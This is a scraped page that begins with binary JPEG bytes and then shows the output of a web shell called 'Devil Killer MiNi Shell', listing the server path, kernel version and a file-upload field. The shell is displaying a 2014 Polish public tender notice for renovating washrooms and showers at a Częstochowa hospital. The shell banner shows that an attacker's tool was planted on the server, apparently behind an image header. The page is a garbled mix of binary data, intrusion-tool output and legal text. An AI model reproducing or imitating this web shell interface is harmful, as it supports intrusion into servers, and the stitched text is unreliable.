JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140611/197410-N-2014.html

<p class="kh_header"><b>Częstochowa: Wykonanie robót budowlanych polegających na remoncie węzłów sanitarnych
mieszczących się na VI piętrze budynku ,,A Wojewódzkiego Szpitala
Specjalistycznego im. Najświętszej Maryi Panny w Częstochowie przy ul. Bialskiej
104-118</b><br>
<b>Numer ogłoszenia: 197410 - 2014; data zamieszczenia: 11.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Najświętszej Marii Panny , ul. Bialska 104/118, 42-200 Częstochowa, woj. śląskie, tel. 034 3673753, faks 034 3651756.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalparkitka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych polegających na remoncie węzłów sanitarnych
mieszczących się na VI piętrze budynku ,,A Wojewódzkiego Szpitala
Specjalistycznego im. Najświętszej Maryi Panny w Częstochowie przy ul. Bialskiej
104-118.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest ,,Wykonanie robót budowlanych polegających na
remoncie węzłów sanitarnych mieszczących się na VI piętrze budynku ,,A
Wojewódzkiego Szpitala Specjalistycznego im. Najświętszej Maryi Panny
w Częstochowie przy ul. Bialskiej 104-118.
2. W szczegółowy zakres przedmiotu zamówienia wchodzi:
1) węzeł sanitarny dla personelu nr pomieszczenia 7/80
a) W pomieszczeniu należy wykonać następujące prace rozbiórkowe: demontaż umywalki,
ubikacji, należy rozebrać ściankę działową, zdemontować drzwi wewnętrzne, wykuć
istniejące drzwi wejściowe, skuć okładziny ścienne z płytek glazurowanych, rozebrać
posadzkę z płytek terakota, skuć podkład betonowy.
b) Prace elektryczne - zdemontować istniejące punkty oświetleniowe, wyłączniki,
istniejącą instalację, przystosować instalację do nowego układu pomieszczenia zgodnie
ze wskazówkami użytkownika. Montaż dwóch punktów oświetlenia na suficie oraz
jednego punktu na ścianie nad umywalką z wyłącznikami i gniazdem hermetycznym.
c) Prace sanitarne - przenieść ubikację w nowe miejsce, a w to miejsce zamontować
brodzik w posadzce, umywalkę przenieść bliżej drzwi wejściowych, prace te wymagają
przeróbek istniejącej instalacji wodno - kanalizacyjnej oraz montażem nowych urządzeń
sanitarnych (brodzika z baterią prysznicową, umywalki z baterią, muszli klozetowej
kompletnej). Montaż wentylatora kanałowego.
d) Prace budowlane - polegają na poszerzeniu istniejącego otworu drzwiowego
z montażem drzwi o wym. 80x200 prawych szt. 1, wykonaniu izolacji
przeciwwilgociowej posadzki i ścian. Licowaniu ścian płytkami glazurowanymi do
wysokości minimum 2,0 m, szerokość spoin do 2,0 mm, wykonanie podłoża
betonowego z ułożeniem posadzki z płytek terakota antypoślizgowych. Naprawa
istniejących tynków ścian i sufitów, malowanie farbami olejnymi i emulsyjnymi. Montaż
zasłony prysznicowej, lustra łazienkowego, podajnika na ręczniki papierowe, uchwytu
na papier toaletowy, potrójne haczyki wieszakowe.
2) pomieszczenia WC dla pacjentów o nr 7/65, 7/72, 7/77
a) W pomieszczeniu należy - wykonać demontaż umywalki, baterii umywalkowej,
ubikacji, rozbiórka ścianki działowej, zdemontować drzwi wewnętrzne oraz drzwi
wejściowe. Skuć okładziny ścienne z płytek glazurowanych, rozbiórkę posadzki z płytek
terakota oraz podłoża betonowego.
b) Prace elektryczne - zdemontować istniejące punkty oświetleniowe, wyłączniki
oraz istniejącą instalację, przystosować instalację do nowego układu pomieszczenia
zgodnie ze wskazówkami użytkownika. Montaż jednego punktu oświetleniowego
na suficie i jednego na ścianie z wyłącznikami.
c) Prace sanitarne - montaż nowych urządzeń sanitarnych (umywalki z baterią, muszli
klozetowej kompletnej) z wymianą instalacji wodno - kanalizacyjnej. Montaż
wentylatorka kanałowego.
d) Prace budowlane - poszerzyć otwory drzwiowe z montażem drzwi o wym. 80x200
(lewe), wykonaniu izolacji przeciwwilgociowej posadzki i ścian, betonowanie podłoża.
Naprawy tynków wewnętrznych sufitów i ścian, licowanie ścian płytkami glazurowanymi
do wysokości 2,0 m i szerokości spoin do 2,0 mm. Położeniu posadzki z płytek terakota
antypoślizgowych. Malowanie farbami emulsyjnymi i olejnymi. Montaż lustra, uchwytu
na papier toaletowy, zasobnika na ręczniki papierowe, potrójne haczyki wieszakowe.
3) pomieszczenie WC dla pacjentów nr 7/69
a) Prace demontażowe - demontaż istniejących punktów oświetleniowych, wyłączników,
instalacji oraz urządzeń sanitarnych, rozbiórka ścianki z drzwiami szt. 2, skucie
licowania ścian z płytek glazurowanych. Rozbiórka posadzek z płytek terakota
z podłożem betonowym.
b) Prace elektryczne - montaż instalacji oraz dwóch punktów oświetleniowych, na suficie
oraz jednego na ścianie z wyłącznikami, gniazdka hermetycznego, zgodnie
z wskazówkami użytkownika.
c) Prace sanitarne - montaż nowych urządzeń sanitarnych (umywalka z baterią, muszla
klozetowa kompletna, pisuar) - z wymianą instalacji wodno - kanalizacyjnej. Montaż
wentylatorka kanałowego
d) Prace budowlane - poszerzenie otworu drzwiowego z montażem drzwi o wym. 80x200
szt. 1 (prawe), montaż wewnętrznej ścianki systemowej z drzwiami szt.2. Izolacja
przeciwwilgociowa posadzek i ścian, naprawa tynków wewnętrznych sufitów i ścian.
Licowanie ścian do wysokości 2,0 m płytkami glazurowanymi i szerokości spoin do 2,0
mm, betonowanie podłoża z ułożeniem posadzki z płytek terakota antypoślizgowych.
Malowanie olejne i emulsyjne, montaż lustra łazienkowego, zasobnika na ręczniki
papierowe, uchwytu na papier toaletowy, potrójne haczyki wieszakowe.
4) pomieszczenie WC dla personelu nr 7/58
a) Prace demontażowe - rozbiórka ścianki działowej z drzwiami, licowania ścian, posadzki
z płytek terakota, instalacji elektrycznej z punktami oświetleniowymi i wyłącznikami,
urządzeń sanitarnych (umywalki z baterią i muszli klozetowej).
b) Prace elektryczne - przystosowanie instalacji do nowego układu pomieszczenia,
umiejscowienie dwóch punktów oświetleniowych z wyłącznikami (jeden na suficie i
jeden na ścianie), gniazdka hermetycznego, zgodnie z wskazówkami użytkownika.
c) Prace sanitarne - wykonanie nowej instalacji wodno - kanalizacyjnej do pomieszczenia
8/57 piętro wyżej z montażem umywalki z baterią, montaż nowych urządzeń
sanitarnych (umywalka z baterią, muszla klozetowa kompletna) z wymianą instalacji
wodno- kanalizacyjnej. Montaż wentylatorka kanałowego.
d) Prace budowlane - poszerzenie otworu drzwiowego z montażem drzwi o wym. 80x200
(prawe), wykonanie izolacji przeciwwilgociowej posadzek i ścian. Naprawa tynków
sufitów i ścian. Uzupełnienie podkładu betonowego, okładziny ścienne z płytek
glazurowanych do wysokości 2,0 m i szerokości spoin do 2,0 mm, posadzki z płytek
terakota antypoślizgowych. Malowanie olejne i emulsyjne sufitów i ścian, montaż
lustra, zasobnika na ręczniki papierowe, uchwytu na papier toaletowy, potrójne haczyki
wieszakowe.
5) natrysk dla personelu nr pomieszczenia 7/61
a) Demontaż istniejącego brodzika z rozbiórką podmurówki, przerobienie odpływu
z montażem nowego brodzika wpuszczonego w posadzkę, uzupełnienie okładzin
ściennych i posadzki z płytek terakota, wymiana drzwi, malowanie farbami olejnymi
i emulsyjnymi, wymiana oświetlenia, montaż wentylatorka kanałowego. Wymiana
grzejnika c.o.
6) natryski dla pacjentów nr pomieszczenia 7/62, 7/76
a) Prace rozbiórkowe - demontaż ścianek działowych z drzwiami, demontaż instalacji
elektrycznej z punktami oświetleniowymi i wyłącznikami, demontaż istniejących
brodzików, rozbiórka licowania ścian z płytek glazurowanych, rozbiórka posadzki
z płytek terakotowych oraz podkładu.
b) Prace elektryczne- przystosowanie instalacji elektrycznej do nowego układu
pomieszczeń, montaż punktów oświetleniowych po jednym na suficie i ścianie
z wyłącznikami, dwóch gniazd hermetycznych zgodnie ze wskazówkami użytkownika.
c) Prace sanitarne - przystosowanie instalacji kanalizacyjnej do brodzików wpuszczanych
w podłogę, wymiana instalacji wody ciepłej i zimnej, montaż dwóch brodzików
z bateriami natryskowymi oraz wentylatorków kanałowych. Wymiana grzejników c.o.
d) Prace budowlane - poszerzenie otworów drzwiowych z montażem drzwi 80x200
(prawe), wykonanie izolacji przeciwwilgociowej posadzek i ścian. Naprawa tynków
sufitów i ścian, okładziny ścienne o wysokości do 2,0 m z płytek glazurowanych i
szerokości spoiny do 2,0mm, posadzki z płytek terakota antypoślizgowych. Malowanie
farbami olejnymi i emulsyjnymi. Montaż luster łazienkowych i zasłon prysznicowych,
potrójne haczyki wieszakowe.
UWAGA.
Zastosowane materiały powinny posiadać atesty, certyfikaty dopuszczające je do
zastosowania w obiektach służby zdrowia. Baterie umywalkowe i natryskowe, ścienne
uruchamiane dźwignią, górna krawędź brodzika nie może wystawać więcej niż do 3,0
cm ponad poziom posadzki. Punkty oświetleniowe, wyłączniki, gniazda przystosowane
do użytkowania w pomieszczeniach wilgotnych, wentylator kanałowy uruchamiany
wyłącznikiem oświetleniowym z opóźnionym wyłączeniem. Skrzydła drzwiowe
obustronnie laminowane z kratką wentylacyjną zamontowaną w dolnej części skrzydła.
Wzmocnione na trzech zawiasach z ościeżnicą metalową wyposażone: w klamki
z szyldami oraz tabliczkami informującymi o zajętości pomieszczenia, zamki na wkładkę
tylko w pomieszczeniach dla personelu. Obmiary oraz ilość, podane są w obmiarach.
W każdym z remontowanych pomieszczeń należy wykonać lub wymienić (jeżeli istnieje)
kratkę podłogową z rusztem nierdzewnym. W celu odprowadzenia wody z powierzchni
posadzki układane płytki powinny posiadać odpowiednie spadki w kierunku wpustu.
3. Zalecane się przeprowadzenie wizji lokalnej w celu zapoznania się z warunkami wykonania
przedmiotu zamówienia. W przypadku zamiaru przeprowadzenia wizji lokalnej, termin należy
uzgodnić z Panem Krzysztofem Pietrasem tel. (34) 367-32-52, 605-264-876.
4. Szczegółowy opis przedmiotu zamówienia zawiera:
1) program funkcjonalno-użytkowy,
2) specyfikacja techniczna wykonania i odbioru robót budowlanych,
3) przedmiar robót,
Dokumentacja ta jest dostępna na stronie internetowej Zamawiającego
www.szpitalparkitka.com.pl.
5. Jeżeli dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót
budowlanych wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki
towarowe, patenty lub pochodzenia - Zamawiający zgodnie z art. 29 ust. 3 ustawy PZP,
dopuszcza oferowanie materiałów lub urządzeń równoważnych.
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez
Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty budowlane
spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy PZP).
Przez ofertę równoważną należy rozumieć zastosowanie materiałów i urządzeń, które posiadają
parametry techniczne, jakościowe, funkcjonalne, użytkowe i estetyczne zbliżone w stosunku do
zamawianych.
Przy czym istotne jest to, że produkt równoważny to produkt, który nie jest identyczny,
tożsamy z produktem referencyjnym, ale posiada pewne, istotne dla Zamawiającego, zbliżone
do produktu referencyjnego cechy i parametry (Wyrok KIO z dnia 16 grudnia 2008 r. sygn. akt.
KIO/UZP 1400/08).
W przypadku, gdy Wykonawca zaproponuje materiały i urządzenia równoważne, informacja o tym musi znaleźć się w kosztorysie ofertowym z zaznaczeniem, że jest to materiał równoważny lub urządzenie równoważne (należy podać nazwę materiału, urządzenia równoważnego). W przypadku braku wskazania materiału, urządzenia równoważnego Wykonawca będzie zobowiązany dostarczyć materiały i urządzenia zgodne z dokumentacją projektową i opisem przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.21.00.00-2, 45.21.51.40-0, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.31.56.00-4, 45.31.60.00-5, 45.33.00.00-9, 45.33.12.00-8, 45.33.20.00-3, 45.40.00.00-1, 45.41.00.00-4, 45.42.00.00-7, 45.42.11.11-5, 45.42.11.31-1, 45.42.11.52-4, 45.43.00.00-0, 45.43.12.00-9, 45.43.11.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>§ 5.	WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW: 
1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału                           w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, tj. dotyczące:     
1)	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
Zamawiający nie stawia w tym zakresie powyższego warunku.
Ocena spełniania tego warunku zostanie dokonana w oparciu o złożenie oświadczenie sporządzone wg wzoru stanowiącego Załącznik Nr 2 do SIWZ.
2)	Posiadania wiedzy i doświadczenia: 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że                      w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał o najmniej dwie roboty budowlane  o wartości minimum 40.000,00 zł brutto każda.


	W przypadku robót budowlanych, których wartość została wyrażona w umowie w  innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia robót budowlanych (w przypadku robót budowlanych rozliczanych wyłącznie w walutach innych niż PLN). 

3)	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca będzie dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj.: 
osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno -budowlanej bez ograniczeń.

Uwaga:
	Kierownik budowy powinien posiadać uprawnienia budowlane bez ograniczeń zgodnie               z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jednolity:. Dz. U. z 2010 r.                 Nr 243, poz. 1623 z późn. zm.) oraz rozporządzeniem Ministra Transportu                               i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jednolity: Dz. U. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.  

Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych                w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity: Dz. U. z. U. Nr 63, poz. 394 z późn. zm.).

4) 	Sytuacji ekonomicznej i finansowej; 
Zamawiający nie stawia w tym zakresie powyższego warunku.
Ocena spełniania tego warunku zostanie dokonana w oparciu o złożenie oświadczenie sporządzone wg wzoru stanowiącego Załącznik Nr 2 do SIWZ.

2.	Zgodnie z treścią art. 26 ust. 2b Wykonawca powołujący się przy wykazaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wzór zobowiązania - Załącznik                Nr 6 do SIWZ  w przypadku, gdy Wykonawca polega na zasobach innych podmiotów.

3.	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy PZP, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia  z postępowania z powodu niespełnienia warunków, o których mowa w art. w 24 ust. 1 ustawy PZP (wzór Załącznik Nr 3 do SIWZ - oryginał).

4.	Jeżeli Wykonawca dokonuje zmiany albo rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. 






Podmiot inny, na zasoby, którego Wykonawca powołuje się w celu spełniania warunku wiedzy i doświadczenia musi brać udział w realizacji zamówienia. Zgodnie z opinią Urzędu Zamówień Publicznych1 nie jest dopuszczalne posługiwanie się w toku postępowania o udzielenie zamówienia publicznego                  w celu wykazania spełniania warunków wiedzy i doświadczenia referencjami podmiotu trzeciego, jeżeli podmiot ten nie będzie brał udziału w wykonaniu zamówienia.

5.	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy. Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów            w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami, gwarantuje rzeczywisty dostęp do ich zasobów nie żąda dokumentów o których mowa w § 1 ust. 6 pkt. 1 i 2 Rozporządzenia Prezesa Rady Ministrów                  z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów. 

6.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunek udziału                          w postępowaniu dotyczący braku podstaw do wykluczenia z postępowania                          o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 oraz art. 24 ust. 2 pkt. 5 ustawy Prawo zamówień publicznych. 

7.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy                                      z warunków określonych w § 6 ust. 1 pkt. 1-4 winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie.
	Warunek określony w § 5 ust. 6 powinien spełniać każdy z Wykonawców samodzielnie. 

§ 6. 	WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU: 
1. 	W celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, do oferty należy załączyć:
1) 	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, według wzoru na Załączniku Nr 2 do SIWZ (oryginał).
2)	Wykaz wykonanych robót budowlanych w zakresie wskazanym w § 5 ust. 1 pkt. 2 SIWZ                  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju                      i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej  prawidłowo ukończone, sporządzony, według Załącznika Nr 4 do SIWZ (oryginał).

	a)	Dowody dotyczące robót wymienionych w w/w wykazie określające czy te roboty zostały wykonane w sposób należyty oraz wskazujące czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, tzn.:
		-	poświadczenie albo
			- 	inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
					Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.

			W przypadku, gdy, Zamawiający jest podmiotem, na rzecz którego roboty budowlane  wskazane w wykazie, o którym mowa w § 6 ust. 1 pkt. 2, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. 





------------------------------------------------------------
1Warunki dopuszczalności powoływania się przez Wykonawcę na referencje dotyczące osób trzecich w celu wykazania spełnienia warunków udziału w postępowaniu (art. 26 ust. 2b ustawy - Prawo zamówień publicznych) Strona nternetowa:http//www.uzp.gov.pl/cmsws/pape/?D;D;2843;warunki-dopuszczalności-powoływania-się-przez wykonawcę -na-referencje-dotyczące-osób-trzecich-w-celu-wykazania-spełnienia-warunków-udziału-w-postępowaniu-0%28art-26-   ust-2b-ustawy-prawo-zamówień-publicznych%29.html.Data wytworzenia;2010-05-17.

3) 	Wykaz osób, którymi dysponuje Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, o uprawnieniach określonych w § 5 ust. 1 pkt. 3 niniejszej specyfikacji, sporządzony przez Wykonawcę według Załącznika Nr 5 do SIWZ (oryginał) wraz                         z informacją o podstawie do dysponowania w/w osobami.  
4)	Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - zawarte w Załączniku Nr 5 do SIWZ.
1

2.	W celu wykazania spełniania warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia                                     w okolicznościach, o których mowa w art. 24 ust. 1 i w art. 24 ust. 2 pkt. 5 ustawy PZP, należy złożyć następujące dokumenty: 
1)	Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy PZP, według wzoru na Załączniku Nr 3 do SIWZ (oryginał). 
2)	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3)	Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa                        w art. 24 ust. 2 pkt. 5 ustawy PZP albo informację, że Wykonawca nie należy do grupy kapitałowej, według wzoru na Załączniku Nr 7 do SIWZ (oryginał).

3.	Wymagania dotyczące dokumentów, określonych w § 6 ust. 1 i ust. 2 niniejszej specyfikacji.
